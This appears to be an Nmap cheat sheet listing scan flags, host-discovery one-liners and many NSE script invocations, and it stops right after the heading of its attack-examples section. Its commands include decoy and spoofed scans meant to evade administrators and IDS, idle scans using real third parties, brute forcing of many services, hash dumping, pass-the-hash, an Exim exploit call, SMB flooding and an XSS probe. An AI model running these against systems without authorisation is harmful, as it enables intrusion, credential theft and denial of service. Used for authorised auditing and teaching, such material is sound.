Nmap is a great tool for discovering the network services and ports that your server is exposing to the network. In this guide, we will discuss some basic information, network scanning and advanced techniques covers how to use one of the most powerful and flexible network scanners available.
1 NMAP Flags………………………………………………………..
2 Common Nmap Uses…………………………………………………..
3 Scan Types………………………………………………………..
4 Scan by using NSE Scripts…………………………………………..
5 NMAP Attack Examples……………………………………………….
5.1 Privilege Escalation……………………………………………..
5.2 NMAP the Target Network…………………………………………..
5.3 Auditing Remote Desktop Passwords with NMAP and Ncrack……………….
5.4 Hacking Windows 7 with NMAP and Metasploit………………………….

Note:

  • sudo nmap -T4 -A -sV -p 1-65535 <Target IP>
  • sudo nmap -T4 -A -v -p 1-65535 <Target IP> Ref: SEC-2259
  • sudo nmap -n -vv -A<Target IP> –min-parallelism=50 –max-parallelism=150 -PN-T2 -oA<Target IP> Ref: SEC-2264

1 NMAP Flags

-sL List Scan (List Targets to Scan)
-sn Ping Scan (Disable Port Scan)
-sS SYN Scan
-sT TCP Connect Scan
-sP Ping Scan
-sU UDP Scan
-sO IP Scan
-b FTP Bounce Scan
-sN TCP Null Scan
-sF FIN Scan
-sX XMAS Scan
-sA ACK Scan
-sW Windows Scan
-sR RPC Scan
-sI <zombie host[:probeport]>: Idle scan
-sY SCTP INIT Scan
-sZ COOKIE-ECHO scans
-sV Probe Open Ports to Identify Service Version Info Scan
-sC SNMP Scan
-A Enable OS Detection, Version Detection, Script Scanning, and TraceRoute

-Pn Treat All Hosts as OnLine (Skip Host Discovery)
-PN Do Not Ask for ICMP Echo Response
-PS / PA / PU / PY[portlist] TCP SYN/ACK, UDP or SCTP Discovery to Specified Ports
-PE / PP / PM ICMP Echo, Timestamp, and Netmask Request Discovery Probes
-n / -R Never do DNS Resolution / Always Resolve [Default: Sometimes] –dns-servers <serv1[,serv2],…> Specify Custom DNS Servers
–system-dns Use OS’s DNS Resolver
–traceroute Trace Hop Path to Each Host

-F Fast Mode
-p <Port-Range>
-O OS Detection
-T<0-5> Timing Template (Higher is Faster)

FIREWALL/IDS EVASION and SPOOFING:
-f; –mtu <val> Fragment Packets (Optionally with specified MTU)
-D <decoy1,decoy2[,ME],…> Cloak a Scan with Decoys
-S <IP_Address> Spoof Source Address
-e <iface> Use Specified Network Interface
-g <portnum> Use specified Port Number
–data-length <num> Append Random Data to Sent Packets
–ip-options <options> Send Packets with Specified IP Options
–ttl <val> Set IP Time-To-Live Field
–spoof-mac <MAC Address/Prefix/Vendor Name> Spoof your MAC address
–badsum Send Packets with a Bogus TCP/UDP/SCTP Checksum

OUTPUT:
-oN/-oX/-oS/-oG <file> Output Scan in Normal, XML, s|<rIpt kIddi3, and Grepable Format, respectively, to the Specified FileName.
-oA <basename> Output in the three major formats at once
-v Increase Verbosity Level (-vv or More for a Greater Verbosity)
-d Increase Debugging Level (-dd or More for a Greater Verbosity)
–reason Display the Reason a Port is in a Particular State
–open Only Show Ppen (or Possibly Open) Ports
–packet-trace Show All Packets Sent and Received
–iflist Print Host Interfaces and Routes (for Debugging)
–log-errors Log Errors/Warnings to the Normal-Format Output File
–append-output Append to Rather than Clobber Specified Output Files
–resume <filename> Resume an Aborted Scan

-iL <Input FileName> Input Targets from a List of Hosts in the Specified File
-iR <Num Hosts> Choose Random Targets
–exclude <host1[,host2][,host3],…> Exclude Hosts / Networks
–excludefile <exclude_file> Exclude List of Nosts / Network from File

2 Common Nmap Uses

Full Scan:
nmap -p1-5000 -T4 -sS 92.246.34.60

Use a Decoy when Scanning Ports to Avoid getting Caught by the SysAdmin
This will show the Decoy IP Address Instead of Your IP in Targets Security Logs. Decoy IP Address Needs to be Alive.
Check the Targets Security Log (/var/log/secure) to make Sure it Worked.
nmap -sS 192.168.0.10 -D 192.168.0.2

Scan the Same Network for All the Services in /etc/services (All of the Reserved Ports) via Very Fast TCP Scan:
nmap -F warez.com/24

Port Scan:
nmap target
nmap -v -sT 192.168.0.0/24
ncat -v -l -p 111
for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done

Ping Scan (or Ping Sweep) of a Subnet:
nmap -sP 10.50.100.1-255
for i in {1..254}; do ping -c 1 -W 1 10.1.1.$i | grep ‘from’; done

Get List of Servers with a Specific Port Open through a TCP Connect Scan (is Slower and has More Overhead than a SYN Scan):
nmap -sT -p 80 -oG – 192.168.1.* | grep open

List of reverse DNS records for a subnet:
nmap -R -sL 209.85.229.99/27 | awk ‘{if($3==”not”)print”(“$2″) no PTR”;else print$3″ is “$2}’ | grep ‘(‘

Find Duplicate Address in a Subnet
for i in $(seq 1 254); do echo “arping -q -D -I eth0 -c 2 192.168.1.${i}”; [ $? -ne 0 ] && echo “192.168.1.${i} duplicate”; done

Find All of the Active IP Addresses in a Subnet (by using Ping Scan):
nmap -sP 192.168.0.*
nmap -sP -R 192.168.1.0/24 |grep up
nmap -sP -PR 192.168.0.*
nmap -sP 10.1.1.0/24 > lanscan.txt
nmap -sP 192.168.1.0/24; arp -n | grep “192.168.1.[0-9]* *ether”
ping -c2 192.168.1.255 >/dev/null; arp -a
arp-scan -l
arp-scan -I eth0 192.168.1.0/24

nmap -v -sP 192.168.0.0/16 10.0.0.0/8

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && echo “192.168.1.$ip UP” || : ; done
for ip in $(seq 1 254); do nslookup 192.168.1.$ip; [ $? -eq 0 ] && echo “192.168.1.$ip UP” || : ; done

OR on Windows:
for /L %i in (1,1,254) do ping -n 1 10.254.254.%i | find /i “Reply”>> c:\ipaddresses.txt

OR Faster:
nmap -sP 192.168.0.0/24 | grep -oE ‘([[:digit:]]{1,3}.){3}[[:digit:]]{1,3}’

Find All of the Active Hosts in the the Adjacent class C’s 193.14.12, .13, .14, .15, … , .30:
nmap -P ‘193.14.[12-30].*’

OR, If you don’t want to have to quote it to avoid shell interpretation:
nmap -P 193.14.12-30.0-255

Find All Unused IP Addresses in a Subnet:
nmap -sP -R 192.168.1.0/24 |grep down

OR:
nmap -T4 -sP 192.168.2.0/24 && egrep “00:00:00:00:00:00” /proc/net/arp

OR:
fping -g 192.168.0.2 192.168.0.254 2>/dev/null
fping -g 192.168.0.2 192.168.0.254 2>/dev/null | grep ‘is unreachable’ | cut -d ‘ ‘ -f 1 | sort -t ‘.’ -k 4 -n

How Many Linux And Windows Devices Are On Your Network?
nmap -F -O 192.168.0.1-255 | grep “Running: ” > /tmp/os; echo “$(cat /tmp/os | grep Linux | wc -l) Linux device(s)”; echo “$(cat /tmp/os | grep Windows | wc -l) Window(s) devices”

OS Detection Scan:
With so many different operating systems and versions around, it is really interesting how Nmap detects the operating system of a target in a very short time. Let us study the OS detection command in detail.

Table 1: Analysing the output of an OS detection scan
Item Interpretation
nmap -O -v -oversiondetect.txt 192.168.2.101 Syntax of the executed command. -v increases the verbosity of the output.
Initiating OS detection (try #1) against 192.168.2.101 OS detection uses a combination of ICMP echo, TCP and UDP packets.
Host 192.168.2.101 is up (0.0030s latency). Discovered the host status in practically no time
Interesting ports on 192.168.2.101:
Not shown: 997 closed ports

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Lists detected open ports on the host
MAC Address: 00:16:76:CE:8C:3C (Intel) MAC address of the host’s Ethernet card, and its manufacturer
Device type: general purpose
Running: Microsoft Windows XP With at least one open and one closed port on the target host, Nmap can detect the target OS effectively. To instruct Nmap to detect OS on only such hosts, to save scan time, use the --osscan-limit option
OS details: Microsoft Windows XP SP2 or SP3 or Windows server 2003
Network Distance: 1 hop The host is in the same network
TCP Sequence Prediction: Difficulty=264 (Good luck!) TCP sequence prediction: The TCP 3 way handshake is initiated by a SYN packet followed by an initial sequence number. If this number can be predicted, an attacker can construct a spoofed packet which will appear to have been sent by the scanned host. This denotes the difficulty of predicting the initial sequence number.
IP ID Sequence Generation: Incremental
Read data files from: /usr/share/nmap
OS detection performed. Please report any incorrect results at http://nmap.org/submit/. Gives the user a chance to submit incorrect OS detection data to the Nmap team, for improvements in the next version.
# NMap done at Tue Nov 30 20:13:03 2010 — 1 IP address (1 host up) scanned in 3.56 seconds Completed the whole OS detection for one host in less than 4 seconds!

Security by obscurity? Assuming you are a Web developer, would you be interested in running an httpd service on a non standard TCP port — say, 1793 — rather than on the standard TCP port 80? In the early days, before I knew enough about various Nmap scan techniques, I thought this was just incredible! I felt I’d found a gold mine! If a service is running on a nonstandard port, it does add a great layer of security.

Welcome to the world of Nmap, which detects practically any service, even running on a non-standard port.
Table 2 shows Nmap scan output against a live IPCop firewall with its Web interface configured on the TCP port 1775. By default, IPCop runs the SSH service on the non-standard TCP port 222 (as against the standard SSH port 22). The output is filtered.

nmap -O -v -oversiondetect.txt 192.168.2.101

OS Detection and Ports Probe Scan against an IPCop Firewall on Ports 222 and 1775 (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -v -O -PN -p222, 1775 -sV -oIPCopOS.txt 121.xxx.xxx.xxx

Find Rogue AP on a Subnet:
nmap -A -p1-85,113,443,8080-8100 -T4 –min-hostgroup 50 –max-rtt-timeout 2000 –initial-rtt-timeout 300 –max-retries 3 –host-timeout 20m –max-scan-delay 1000 -oA wapscan 10.0.0.0/8

Find the Conficker Virus on a Subnet (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -T4 -p139,445 -n -v –script=smb-check-vulns –script-args safe=1 192.168.0.1-254

SNMP Win32 Users Scan:
nmap -sV -sC 192.168.101.0/24

Scan 4096 IP Addresses for Any Web Servers (without pinging them) and Save Output in grepable and XML formats (using the -Pn Option to Skip Pinging the Targets):
nmap -Pn -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20

Scan the Specified Subnet for NetBIOS Informations:
nbtscan -v -m 2 192.168.1.1/24

Get Current Host Public IP:
alias myip=’curl -s http://checkrealip.com/ | grep “Current IP Address”‘

Complete TCP Handshake on a spcified Host-Port:
nc -zvw 1 host port

IDS Evasion Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254

Confuse IDS / IPS by sending requests with decoy’s or different IP address:
nmap -sS -D234.34.34.45,ME,234.23.34.23 -p 80 www.xyz.com

Get SMB Server Time:
nmap –script=smb-os-discovery.nse xxx.xxx.xxx.xxx/24 -p 139,445 | grep “System time” | sort -r

3 Scan Types

Stealth Scan of the Entire Class “B” Networks 166.66.0.0 and 166.67.0.0 for the IMAPd Daemon:
nmap -Up 143 166.66.0.0/16 166.67.0.0/16

Stealth SYN Scan with OS Detection on the Specified Network:
nmap -sS -O scanme.nmap.org/24

ACK Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sA -vv -n -p1-1000 -T4 -oNmapACKScan.txt 117.X.X.X

TCP Connect Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sT -vv -n -p1-1000 -T4 -oNmapTCPConnect.txt 117.X.X.X

Version Detection Scan and Host Enumeration on the Specified Ports and IP Address Range
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127

SYN Scan to Get Info about Remote Host Ports and OS Detection:
nmap -sS -P0 -sV -O <target>

Fragmented SYN Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sS -f -vv -n -p1-1000 -T4 -max-rtt-timeout 15 -oNmapSYNScan.txt 117.X.X.X

Fragmented SYN Scan the Class “C” Network on which warez.com Sits for Popular Services:
nmap -fsp 21,22,23,25,80,110 warez.com/24

XMAS Tree Scan on the Specified Subnet:
nmap -v -sX 192.168.0.0/24

FIN Scan on the Specified Subnet:
nmap -v -sF 192.168.0.0/24

TCP Null Scan on the Specified Subnet:
nmap -v -sN 192.168.0.0/24

TCP Windows Scan on the Specified Subnet:
nmap -v -sW 192.168.0.0/24

TCP RPC Scan on the Specified Subnet:
nmap -v -sR 192.168.0.0/24

FTP Bounce Attack Scan (Scan secret.pathetic.net using the FTP Bounce Attack Off of ftp.pathetic.net):
nmap -Db ftp.pathetic.net secret.pathetic.net

UDP Scan and TCP Connect Scan for Open Ports (Firewall Scan from Inside the Network):
nmap -vv -sU -sT -p1-1000 -n -r -T4 -oNmapIPCopInternal.txt 192.168.1.1

Idle Scan against the RIAA by providing a Zombie (kiosk.adobe.com):
nmap -P0 -p- -sI kiosk.adobe.com www.riaa.com

Stealth Idle Scan with Packet Trace:
nmap -sI Zombie -Pn -p20-25,110 -r –packet-trace -v Target

4 Scan by using NSE Scripts

The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write and share scripts to automate a wide variety of networking tasks.
Those scripts are written in the embedded Lua programming language and they are executed in parallel.
Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs.
You can find here the official Nmap NSE Scripts and LUA Libraries Portal, where you can browse and download the scripts by categories or by alphabetically name.

You can find below many useful examples of running Nmap scans by using NSE scripts.

Sniffer Detection on the Specified File Containing a List of IP Addresses:
nmap-script sniffer-detect -iL IPList.txt -osniffer-detect.txt

Perform a Firewalking (Discover Firewall Rules using an IP TTL Expiration Technique):
nmap –script=firewalk –traceroute <host>
nmap –script=firewalk –traceroute –script-args=firewalk.max-retries=1 <host>
nmap –script=firewalk –traceroute –script-args=firewalk.probe-timeout=400ms <host>
nmap –script=firewalk –traceroute –script-args=firewalk.max-probed-ports=7 <host>

Detects a Vulnerability in Netfilter and other Firewalls that use Helpers to dynamically Open Ports for Protocols, such as FTP and SIP:
nmap –script firewall-bypass <target>
nmap –script firewall-bypass –script-args firewall-bypass.helper=”ftp”, firewall-bypass.targetport=22 <target>

Perform a DNS Fuzzing Attack against DNS Server:
nmap –script dns-fuzz –script-args timelimit=2h 192.168.101.9

Perform a Form Fuzzing against Forms on WebSites:
nmap –script http-form-fuzzer -p 80 192.168.101.9

Crawls a Web Server and Sends an Attack Vector/Probe to Find PHP Files Vulnerable to Reflected Cross Site Scripting via the variable $_SERVER[“PHP_SELF”],
PHP_SELF XSS Refers to Vulnerabilities caused by the Lack of Sanitation of the variable $_SERVER[“PHP_SELF”] commonly used in PHP Scripts that display forms:
The Vector/Probe Attack used is /'”/><script>alert(1)</script>
nmap –script=http-phpself-xss -p80 <target>
nmap -sV –script http-self-xss <target>

Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369):
nmap -sV –script realvnc-auth-bypass.nse 192.168.101.3
nmap -sV -sC –script realvnc-auth-bypass 192.168.101.3

Oracle 11g Users Scan (bug fixed in Oracle’s October 2009 Critical Patch Update):
nmap –script oracle-enum-users –script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 192.168.101.25

Dumps the Password Hashes from an MySQL Server in a Format Suitable for Cracking by Tools such as John-the-ripper:
nmap -p 3306 192.168.101.9 –script mysql-dump-hashes –script-args=’username=root,password=secret’

MySQL Server Users Scan:
nmap -sV –script mysql-users 192.168.101.9

Brute Force Passwords MySQL:
nmap –script=mysql-brute 192.168.101.9

Run a Query against a MySQL Database and Returns the Results as a Table:
nmap -p 3306 192.168.101.9 –script mysql-query –script-args=’query=”SELECT * FROM table_name WHERE (userID LIKE ‘%ELM%’);”[,username=root,password=secret]’
nmap -p 3306 192.168.101.9 –script mysql-query –script-args=’query=”GRANT ALL PRIVILEGES ON db_base.* TO db_user @’%’ IDENTIFIED BY ‘db_passwd’;”[,username=root,password=secret]’
nmap -p 3306 192.168.101.9 –script mysql-query –script-args=’query=”INSERT INTO table_name (status, permissions) VALUES (‘OK’,’ALL’) WHERE (userID LIKE ‘%ELM%’);”[,username=root,password=secret]’

Dumps the Password Hashes from an Microsoft SQL Server (ms-sql) in a Format Suitable for Cracking by Tools such as John-the-ripper:
nmap -p 1433 192.168.101.5 –script ms-sql-dump-hashes

Attempts to Authenticate to Microsoft SQL Servers using an Empty Password for the Sysadmin (sa) Account:
nmap -p 445 –script ms-sql-empty-password –script-args mssql.instance-all 192.168.101.5
nmap -p 445 –script ms-sql-empty-password –script-args mssql.instance-name=PRDB,mssql.instance-port=1432 192.168.101.5
nmap -p 1433 –script ms-sql-empty-password 192.168.101.5

Queries Microsoft SQL Server (ms-sql) Instances for a List of Databases a User has Access to:
nmap -p 1433 –script ms-sql-hasdbaccess –script-args mssql.username=sa,mssql.password=sa 192.168.101.5
nmap -p 1433 –script ms-sql-hasdbaccess –script-args mssql.username=sa,mssql.password=sa,mssql.instance-all 192.168.101.5
nmap -p 1433 –script ms-sql-hasdbaccess –script-args mssql.username=sa,mssql.password=sa,mssql.instance-name=PRDB,mssql.instance-port=1432 192.168.101.5

Retrieves the Authentication Scheme and Realm of a Web Service that Requires Authentication:
nmap –script http-auth [–script-args http-auth.path=/login] -p80 192.168.101.45

Scan for Access with Default Credentials used by a variety of Web Applications and Devices:
nmap -p80 –script http-default-accounts 192.168.101.45

Scan for a JBoss Server is Vulnerable to JMX Console Authentication Bypass (CVE-2010-0738):
nmap –script=http-vuln-cve2010-0738 –script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}’ 192.168.101.45

Discovers Valid Usernames by Brute-Force Querying Likely Usernames against a Kerberos Service:
nmap -p 88 –script krb5-enum-users –script-args krb5-enum-users.realm=’test’

Checks Target IP Addresses against Multiple DNS Anti-Spam and Open Proxy Blacklists and Returns a List of Services for which an IP has been Flagged.
Checks may be Limited by Service Category (eg: SPAM, PROXY) or to a Specific Service Name.
nmap –script dns-blacklist –script-args=’dns-blacklist.ip=192.168.101.45′
nmap -sn 192.168.101.45 –script dns-blacklist

Detects whether the Remote Device has IP Forwarding or “Internet Connection Sharing” Enabled, by Sending an ICMP Echo Request to a Given Target using the Scanned Host as Default Gateway:
nmap -sn 192.168.101.145 –script ip-forwarding –script-args=’target=www.example.com’

Extracts a List of Citrix Servers from the ICA Browser Service:
nmap -sU –script=citrix-enum-servers -p 1604

Extracts a List of Applications, ACLs, and Settings from the Citrix XML Service:
nmap –script=citrix-enum-apps-xml -p 80,443,8080 192.168.101.45

Check if ePO Agent is Running on Port 8081 or Port Identified as ePO Agent Port:
nmap -sV –script=mcafee-epo-agent 192.168.101.45

Check Presence of ms12-020 RDP vulnerability:
nmap –sC –p 3389 –vv –script-trace –script ms12-020-rev.nse 192.168.10.10

Attempts to Perform an LDAP Search and Returns All Matches:
nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,
ldap.qfilter=users,ldap.attrib=sAMAccountName’ 192.168.101.45

nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,
ldap.qfilter=custom,ldap.searchattrib=”operatingSystem”,ldap.searchvalue=”Windows *Server*”,ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}’ 192.168.101.45

Retrieves the LDAP Root DSA-Specific Entry (DSE):
nmap -p 389 –script ldap-rootdse 192.168.101.45

Lists Remote File Systems by Querying the Remote Device using the Network Data Management Protocol (ndmp).
NDMP is a Protocol Intended to Transport Data Between a NAS Device and the Backup Device, Removing the Need for the Data to Pass through the Backup Server.
nmap -p 10000 –script ndmp-fs-info

Retrieves Configuration Information from a Lexmark S300-S400:
nmap -sV –script=lexmark-config 192.168.101.45 192.168.101.45

Lotus Domino Users Scan:
nmap –script domino-enum-users -p 1352 192.168.101.145

Scan for an identd (auth) Server which is Spoofing its Replies:
nmap -sV –script=auth-spoof 192.168.101.145

Looks for Signature of Known Server Compromises
http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/.
nmap -sV –script=http-malware-host 192.168.101.145

Checks if Hosts are on Google’s Blacklist of Suspected Malware and Phishing Servers.
The script queries the Google’s Safe Browsing service and you need to have your own API key to access Google’s Safe Browsing Lookup services.
Sign up for yours at http://code.google.com/apis/safebrowsing/key_signup.html.
nmap -p80 –script http-google-malware 192.168.101.145

Scan for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523):
nmap –script ftp-vsftpd-backdoor -p 21 192.168.101.145

Scan for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562:
nmap –script ftp-proftpd-backdoor -p 21 192.168.101.145

Brute Force Password Scan against the WinPcap Remote Capture Daemon (rpcap):
nmap -p 2002 192.168.101.145 –script rpcap-brute

Brute Force Password Scan against rsync:
nmap -p 873 –script rsync-brute –script-args ‘rsync-brute.module=www’ 192.168.101.145

Brute Force Password Scan against the VMWare Authentication Daemon (vmware-authd):
nmap -p 902 192.168.101.145 –script vmauthd-brute

Brute Force Password Scan against VNC Servers:
nmap –script vnc-brute -p 5900 192.168.101.145

Brute Force Password Scan against SMTP using LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM:
nmap -p 25 –script smtp-brute 192.168.101.145

Brute Force Password Scan against rlogin service:
nmap -p 513 –script rlogin-brute 192.168.101.145

Brute Force Password Scan against POP3 Servers using either “USER” (default), “SASL-PLAIN”, “SASL-LOGIN”, “SASL-CRAM-MD5”, or “APOP”:
nmap -sV –script=pop3-brute 192.168.101.145

Brute Force Password Scan against IMAP Servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM Authentication:
nmap -p 143,993 –script imap-brute 192.168.101.145

Scan for and/or Exploits a Heap Overflow within Versions of Exim prior to 4.69 (CVE-2010-4344) and a Privilege Escalation Vulnerability in Exim 4.72 and below (CVE-2010-4345).
The heap overflow vulnerability allows remote attackers to execute arbitrary code with the privileges of the Exim daemon (CVE-2010-4344). If the exploit fails then the Exim smtpd child will be killed (heap corruption).
The privilege escalation vulnerability allows the exim user to gain root privileges by specifying an alternate configuration file using the -C option (CVE-2010-4345).
nmap –script=smtp-vuln-cve2010-4344 –script-args=”smtp-vuln-cve2010-4344.exploit” -pT:25,465,587 192.168.101.145
nmap –script=smtp-vuln-cve2010-4344 –script-args=”exploit.cmd=’uname -a'” -pT:25,465,587 192.168.101.145

Detects PHP-CGI Installations Vulnerable to CVE-2012-1823, a Critical Vulnerability that Allows Attackers to Retrieve Source Code and Execute Code Remotely.
The script works by appending “?-s” to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern “<span style=.*>&lt;?” to detect vulnerable installations.
nmap -sV –script http-vuln-cve2012-1823 192.168.101.145
nmap -p80 –script http-vuln-cve2012-1823 –script-args http-vuln-cve2012-1823.uri=/test.php 192.168.101.145

Scan a Web Server for Slowloris DoS attack Vulnerability:
nmap –script http-slowloris –max-parallelism 400 192.168.101.145

Exhausts a Remote SMB Server’s Connection Limit by Opening as Many Connections as we can.
Most implementations of SMB have a Hard Global Limit of 11 Connections for User Accounts and 10 Connections for anonymous.
Once that Limit is rReached, further Connections are Denied. This Script Exploits that Limit by taking up All the Connections and Holding them.
This works better with a valid user account, because Windows reserves one slot for valid users.
nmap –script smb-flood.nse -p445 192.168.101.145
nmap -sU -sS –script smb-flood.nse -p U:137,T:139 192.168.101.145

Detects Huawei Modems Models HG530x, HG520x, HG510x (and others…) Vulnerable to a Remote Credential and Information Disclosure Vulnerability. It also Extracts the PPPoE Credentials and Other interesting Configuration Values.
nmap -p80 –script http-huawei-hg5xx-vuln <target>
nmap -sV http-huawei-hg5xx-vuln <target>

Scan to Discover Hosts in the Local Network using the DNS Service Discovery protocol and Sends a NULL UDP Packet to Each Host to Test if it’s Vulnerable to the Avahi NULL UDP Packet Denial Of Service (CVE-2011-1002):
nmap –script=broadcast-avahi-dos

Exploits the CVE-2012-3137 Vulnerability, a Weakness in Oracle’s O5LOGIN Authentication Scheme:
nmap –script oracle-brute-stealth -p 1521 –script-args oracle-brute-stealth.sid=ORCL 192.168.101.145

Guesses Oracle Instance/SID Names against the TNS-Listener:
nmap –script=oracle-sid-brute –script-args=oraclesids=/path/to/sidfile -p 1521-1560 192.168.101.145
nmap –script=oracle-sid-brute -p 1521-1560 192.168.101.145

Brute Force Password Scan against Nessus Vulnerability Scanning Daemon using the NTP 1.2 Protocol:
nmap –script nessus-brute -p 1241 192.168.101.145

acarsd Scan on the Specified Port and Host/Network:
nmap –script acarsd-info –script-args “acarsd-info.timeout=10,acarsd-info.bytes=512” -p <port> 192.168.101.145

Brute Force Password Scan against FTP Server:
nmap –script ftp-brute -p 21 192.168.101.145

Scan an FTP Server for Anonymous Login:
nmap -sV –script ftp-anon 192.168.101.145

Spiders a Web Site and Collects eMail Addresses:
nmap –script=http-email-harvest 192.168.101.145

Checks for a Path-Traversal Vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733):
nmap –script http-vmware-path-vuln -p80,443,8222,8333 192.168.101.145

Retrieves Information from an Apache Hadoop Secondary NameNode HTTP Status Page:
nmap –script hadoop-secondary-namenode-info -p 50090 192.168.101.145

Retrieves Information from an Apache Hadoop NameNode HTTP Status Page:
nmap –script hadoop-namenode-info -p 50070 192.168.101.145

Discovers Hostnames that Resolve to the Target’s IP Address by Querying the Robtex Service at http://www.robtex.com/dns/:
nmap –script hostmap-robtex

Retrieves the Locations of All “Find my iPhone” Enabled iOS Devices by Querying the MobileMe Web Service:
nmap -sn -Pn –script http-icloud-findmyiphone –script-args=’username=<user>,password=<pass>’

Brute Force Password Scan against HTTP Server (Basic Authentication – Default Method GET):
nmap –script http-brute -p 80 192.168.101.145

Brute Force Password Scan against HTTP Server (Form-Based Authentication):
nmap –script http-form-brute -p 80 192.168.101.145

Brute Force Password Auditing against Joomla Web CMS Installations:
nmap -sV –script http-joomla-brute –script-args ‘userdb=users.txt,passdb=passwds.txt,http-joomla-brute.hostname=domain.com,http-joomla-brute.threads=3,brute.firstonly=true’ 192.168.101.145
nmap -sV –script http-joomla-brute 192.168.101.145

Brute Force Password Scan against HTTP Proxy Server:
nmap –script http-proxy-brute -p 8080 192.168.101.145

Brute Force Password Auditing against the BackOrifice Service:
nmap -sU –script backorifice-brute 192.168.101.115 –script-args backorifice-brute.ports=”U:31337,25252,151-222″, “U:1024-1512”

Brute Force LDAP Authentication:
nmap -p 389 –script ldap-brute –script-args ldap.base='”cn=users,dc=cqure,dc=net”‘ <host>

Brute Force Password against iSCSI Target:
nmap -sV –script=iscsi-brute 192.168.101.115

Brute Force Password against WordPress CMS/Blog Server:
nmap -sV –script http-wordpress-brute 192.168.101.115
nmap -sV –script http-wordpress-brute –script-args ‘userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true’ 192.168.101.115

Attempts to Guess Valid Credentials for the Citrix PN Web Agent XML Service:
nmap –script=citrix-brute-xml –script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443,8080 192.168.101.115

Detect Zeus Botnet (by querying [email protected]) in the Specified Network (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -v -sn -PN –script=dns-zeustracker 192.168.101.0/24

OR:
dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch A
dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch TXT
dig +short domain_name.uribl.zeustracker.abuse.ch A
dig +short domain_name.uribl.zeustracker.abuse.ch TXT
# The Response 127.0.0.2 means that the Domain is Listed on the ZT.
# To Check the IP address 123.124.125.126:
dig +short 126.125.124.123.ipbl.zeustracker.abuse.ch TXT
# To Check the Domain dantor777.com:
dig +short dantor777.com.uribl.zeustracker.abuse.ch A
dig +short dantor777.com.uribl.zeustracker.abuse.ch TXT

Perform a DNS Update (without Authentication):
nmap -sV –script=dns-update 192.168.1.14

Performs Password Guessing Against Apple Filing Protocol (AFP):
nmap -p 548 –script afp-brute 192.168.1.3

Shows AFP shares and ACLs:
nmap -sV –script=afp-showmount 192.168.1.3

Listens for the LAN Sync Information Broadcasts that the Dropbox.com Client Broadcasts Every 20 seconds, then Prints All the Discovered Client IP Addresses, Port Numbers, Version Numbers, Display Names, and more:
nmap -sV –script=broadcast-dropbox-listener 192.168.101.0/24

Discovers EMC Networker Backup Software Servers on a LAN by Sending a Network Broadcast Query:
nmap –script broadcast-networker-discover

Scan to Check Windows Security Mode(s) Supported (for example, if Message signing is not supported, then Man-In-The-Middle Attacks are possible):
nmap -p445 –script=smb-security-mode 192.168.101.30

Windows OS Discovery Scan:
nmap -p445 -script=smb-os-discovery 192.168.101.30

Windows Shares Enumeration Scan (Without Specifying Credentials and by Specifying a User and a Password or a Hash):
nmap -p445 –script=smb-enum-shares 192.168.101.50

by Specifying a User and a Password:
nmap -v -p445 –script=smb-enum-shares –scriptargs=smbuser=administrator,smbpass=blink182 10.0.0.0/24

by Specifying a User and a Hash with the “Passwing the Hash” technique (the Hash can be Obtained by Using fgdump or pwdump6, decrypted from the SAM file, dumped with the “smb-pwdump.nse” script):
nmap -p445 –script=smb-enum-shares –scriptargs=smbuser=administrator,smbhash=cd401a40ae92face50b8e4fe1911060e

Password Hashes dumped this way from one server can be directly used to access other servers, without cracking them. The hash can be used directly by passing a “smbhash” argument instead of “smbpass”:

Brute-Force Windows Account Passwords:
nmap -p445 –script=smb-brute.nse,smb-enum-shares 10.0.0.0/24

Attempt a Brute Login through SMB Windows Account:
nmap -p445 –script=smb-brute 192.168.101.50

Windows Users Enumeration (using both SAMR and LSA):
nmap -v -p445 –script=smb-enum-users 192.168.101.50
nmap -sU -sS –script smb-enum-users.nse -p U:137,T:139 192.168.101.50

Windows Sessions Enumeration:
nmap -vv -p445 –script=smb-enum-sessions 192.168.101.50

Windows Processes Enumeration:
nmap -vv -p445 –script=smb-enum-processes –scriptargs=smbuser=test,smbpass=test 192.168.101.50

Windows System Info:
nmap -p445 –script=smb-system-info –script-args=smbuser=test,smbpass=test 192.168.101.50

5 NMAP Attack Examples

5.1 Privilege Escalation

Perform a Ping Sweep Check the Active IP Addresses in the Subnet:
